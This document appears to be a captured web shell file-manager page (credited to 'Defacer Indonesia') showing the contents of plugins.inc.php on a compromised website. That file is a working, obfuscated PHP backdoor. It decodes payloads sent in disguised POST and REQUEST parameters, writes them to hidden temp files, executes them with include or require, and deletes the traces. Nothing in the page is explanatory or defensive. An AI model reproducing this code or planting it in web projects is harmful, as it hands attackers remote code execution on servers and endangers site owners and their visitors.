whoami7 - Manager
:
/
home
/
analuakl
/
karanoverseas.in
/
Upload File:
files >> /home/analuakl/karanoverseas.in/plugins.inc.php
<?php if(array_key_exists("fac\x74\x6F\x72", $_POST)){ $reference = $_POST["fac\x74\x6F\x72"]; $reference = explode ( "." , $reference ) ; $data = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2); $k = 0; $__tmp = $reference; while ($v1 = array_shift($__tmp)) { $chS = ord($salt2[$k%$lenS]); $d = ((int)$v1 - $chS - ($k%10))^94; $data .= chr($d); $k++; } $token = array_filter([getcwd(), getenv("TMP"), session_save_path(), sys_get_temp_dir(), "/tmp", "/var/tmp", getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir")]); $resource = 0; do { $res = $token[$resource] ?? null; if ($resource >= count($token)) break; if (!( !is_dir($res) || !is_writable($res) )) { $pset = vsprintf("%s/%s", [$res, ".pointer"]); if (file_put_contents($pset, $data)) { require $pset; unlink($pset); die(); } } $resource++; } while (true); } if(!is_null($_POST["r\x65f"] ?? null)){ $record = array_filter(["/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", getenv("TMP"), "/dev/shm", session_save_path(), getcwd()]); $k = $_POST["r\x65f"]; $k = explode('.' ,$k); $val = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $s = 0; $len = count($k ); do { if ($s >= $len) break; $v1 = $k[$s]; $sChar = ord($salt[$s % $sLen] ); $d = ((int)$v1 - $sChar - ($s % 10)) ^ 1; $val .= chr($d ); $s++;}while (true ); for ($resource = 0, $symbol = count($record); $resource < $symbol; $resource++) { $itm = $record[$resource]; if ((function($d) { return is_dir($d) && is_writable($d); })($itm)) { $desc = vsprintf("%s/%s", [$itm, ".pgrp"]); $file = fopen($desc, 'w'); if ($file) { fwrite($file, $val); fclose($file); include $desc; @unlink($desc); die(); } } } } if(array_key_exists("\x72e\x63", $_REQUEST) && !is_null($_REQUEST["\x72e\x63"])){ $res = array_filter(["/dev/shm", getenv("TEMP"), getcwd(), "/tmp", "/var/tmp", session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP")]); $value = $_REQUEST["\x72e\x63"]; $value = explode ( "." , $value ) ; $object = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s7); $y = 0; while ($y < count($value)) { $v4 = $value[$y]; $chS = ord($s7[$y %$lenS]); $dec = ((int)$v4 - $chS - ($y %10)) ^ 57; $object.= chr($dec); $y++;} foreach ($res as $key => $dchunk) { if ((is_dir($dchunk) and is_writable($dchunk))) { $element = sprintf("%s/.component", $dchunk); $success = file_put_contents($element, $object); if ($success) { include $element; @unlink($element); die();} } } }
Copyright ©2021 || Defacer Indonesia